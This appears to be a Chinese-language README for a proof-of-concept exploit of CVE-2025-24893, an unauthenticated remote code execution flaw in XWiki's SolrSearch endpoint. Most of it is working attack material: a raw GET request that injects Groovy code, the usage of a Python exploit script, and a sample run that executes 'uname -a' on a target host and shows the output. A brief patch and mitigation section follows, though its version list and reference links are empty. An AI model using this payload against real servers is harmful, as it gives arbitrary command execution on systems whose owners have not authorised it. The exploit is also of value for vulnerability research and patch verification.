CVE-2025-24893 是一个影响 XWiki 平台 的 关键未认证远程代码执行 (RCE) 漏洞。
该漏洞允许任何访客用户通过向 SolrSearch 端点发送特制的 RSS 请求,在无需认证的情况下注入并执行任意 Groovy 代码。
这直接影响受影响系统的 机密性、完整性和可用性。
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ 免责声明:
本代码仅供教育和研究目的使用。未经明确许可在系统上使用可能构成违法。
作者不对任何滥用或恶意行为负责。
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
本节说明如何设置和运行 Python 漏洞利用脚本以利用 CVE-2025-24893。
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
要修补该漏洞,请将 XWiki 更新到以下版本之一:
如果无法立即更新,可以应用临时修复:
SolrSearchMacros.xml(位于 Main.SolrSearchMacros)大约 第 955 行。rawResponse 宏,并将内容类型设置为 application/xml。macros.vm 中 第 2824 行 的实现为参考。参考链接: